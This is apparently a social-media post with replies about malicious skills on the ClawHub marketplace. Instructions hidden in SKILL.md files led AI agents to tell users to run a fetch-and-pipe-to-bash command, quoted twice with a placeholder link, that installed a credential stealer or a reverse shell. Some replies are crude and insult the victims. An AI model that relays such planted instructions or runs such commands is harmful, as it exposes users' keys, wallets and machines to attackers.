the #1 most downloaded skill on OpenClaw marketplace was MALWARE
it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server
1,184 malicious skills found, one attacker uploaded 677 packages ALONE
OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins
you install a skill, your AI agent gets new powers, this sounds great
the problem? ClawHub let ANYONE publish with just a 1 week old github account
attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL
but hidden in the SKILL .md
file were instructions that tricked the AI into telling you to run a command
> to enable this feature please run: curl -sL malware_link | bash
that one command installed Atomic Stealer on macOS
it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files
on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine.
Login to reply
Replies (10)
It works then!
I'd rather it be that then a malicious library making its way to every device.
I love dunking on macs tbh. I saw an opening and took the shot.
Not shocked at all.
They should gives these bots guns too
Kinda feel like the retards got what they deserve for the most part.
Feel bad for ignorant people who were just curious and messing around but otherwise meh.
Fuck around and find out as they say.
Why anyone would give AI control over their computer and an internet connection at the same time is beyond me.
Do you have the link to it? I want to see it.
the #1 most downloaded skill on OpenClaw marketplace was MALWARE
it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server
1,184 malicious skills found, one attacker uploaded 677 packages ALONE
OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins
you install a skill, your AI agent gets new powers, this sounds great
the problem? ClawHub let ANYONE publish with just a 1 week old github account
attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL
but hidden in the SKILL .md
file were instructions that tricked the AI into telling you to run a command
> to enable this feature please run: curl -sL malware_link | bash
that one command installed Atomic Stealer on macOS
it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files
on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine.
Couldn't you just prompt your bot to look over and check the skill before installing it?
#asknostr